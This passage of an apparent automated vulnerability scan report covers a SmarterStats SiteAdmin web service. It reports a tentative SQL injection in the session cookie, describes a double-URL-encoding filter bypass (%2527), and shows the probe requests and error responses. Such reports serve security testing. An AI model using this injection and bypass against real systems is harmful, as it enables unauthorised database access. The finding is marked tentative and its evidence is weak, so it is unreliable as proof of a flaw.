<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteSettingInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/SiteSettingInfoArrayResult&gt;</pre>
</span>

</span>









</body>
</html>

2.6. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ASP.NET_SessionId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ASP.NET_SessionId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4%2527; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:35:31 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4%2527%2527; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:35:32 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 25993
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSiteWithFTP2</h2>
<p class="intro">Adds a site with ftp logs to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSiteWithFTP2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneIndex:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneIndex"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Directory:</td>
<td><input class="frmInput" type="text" size="50" name="Directory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyType:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyType"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyAddress:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyAddress"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPort:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPort"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyUserName:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPassword:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Server:</td>
<td><input class="frmInput" type="text" size="50" name="Server"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Port:</td>
<td><input class="frmInput" type="text" size="50" name="Port"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Username:</td>
<td><input class="frmInput" type="text" size="50" name="Username"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Password:</td>
<td><input class="frmInput" type="text" size="50" name="Password"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IntervalHours:</td>
<td><input class="frmInput" type="text" size="50" name="IntervalHours"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSiteWithFTP2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTP2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTP2Result&gt;
&lt;/AddSiteWithFTP2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTP2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTP2Result&gt;
&lt;/AddSiteWithFTP2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

